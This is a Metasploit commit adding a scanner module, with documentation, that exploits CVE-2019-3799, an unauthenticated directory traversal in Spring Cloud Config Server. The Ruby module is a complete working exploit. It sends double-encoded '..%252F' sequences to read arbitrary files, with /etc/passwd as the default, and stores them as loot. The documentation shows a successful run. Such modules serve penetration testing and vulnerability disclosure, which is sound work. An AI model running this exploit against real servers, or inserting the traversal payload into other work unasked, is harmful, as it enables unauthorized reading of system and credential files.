Land #11745, Add spring-cloud-config-server dir traversal

rapid7 · Apr 26, 2019 · c282547 · c282547
2 parents decb88b + 306b0fd
commit c282547
Show file tree

Hide file tree

Showing 2 changed files with 106 additions and 0 deletions.
diff --git a/documentation/modules/auxiliary/scanner/http/springcloud_traversal.md b/documentation/modules/auxiliary/scanner/http/springcloud_traversal.md
@@ -0,0 +1,35 @@
+## Description
+
+This module exploits an unauthenticated directory traversal vulnerability, which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6.
+Spring Cloud Config listens by default on port 8888.
+
+### Vulnerable Application
+
+* https://github.com/spring-cloud/spring-cloud-config/archive/v2.1.1.RELEASE.zip
+
+## Verification
+
+1. `./msfconsole`
+2. `use auxiliary/scanner/http/springcloud_traversal`
+3. `set rhosts <rhost>`
+4. `run`
+
+## Scenarios
+
+### Tested against Linux zero 4.15.0-48-generic #51-Ubuntu SMP x86_64 GNU/Linux
+
+```
+msf > use auxiliary/scanner/http/springcloud_traversal 
+msf auxiliary(scanner/http/springcloud_traversal) > set RHOSTS 192.168.1.132
+RHOSTS => 192.168.1.132
+msf auxiliary(scanner/http/springcloud_traversal) > run
+
+[+] File saved in: /home/input0/.msf4/loot/20190418203756_default_192.168.1.132_springcloud.trav_893434.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(scanner/http/springcloud_traversal) >
+```
+
+## References
+
+* https://pivotal.io/security/cve-2019-3799
diff --git a/modules/auxiliary/scanner/http/springcloud_traversal.rb b/modules/auxiliary/scanner/http/springcloud_traversal.rb
@@ -0,0 +1,71 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Spring Cloud Config Server Directory Traversal',
+      'Description' => %q{
+        This module exploits an unauthenticated directory traversal vulnerability
+        which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,
+        versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6. Spring
+        Cloud Config listens by default on port 8888.
+      },
+      'References'  =>
+        [
+          ['CVE', '2019-3799'],
+          ['URL', 'https://pivotal.io/security/cve-2019-3799']
+        ],
+      'Author'      =>
+        [
+          'Vern', # Vulnerability discovery
+          'Dhiraj Mishra' # Metasploit module
+        ],
+      'DisclosureDate' => '2019-04-17',
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8888),
+        OptString.new('FILEPATH', [true, "The path to the file to read", '/etc/passwd']),
+        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
+      ])
+  end
+
+  def data
+    Rex::Text.rand_text_alpha(3..8)
+  end
+
+  def run_host(ip)
+    filename = datastore['FILEPATH']
+    traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
+    uri = "/#{data}/#{data}/master/#{traversal}"
+
+    res = send_request_raw({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    unless res && res.code == 200
+      print_error('Nothing was downloaded')
+      return
+    end
+
+    vprint_good("#{peer} - #{res.body}")
+    path = store_loot(
+      'springcloud.traversal',
+      'text/plain',
+      ip,
+      res.body,
+      filename
+    )
+    print_good("File saved in: #{path}")
+  end
+end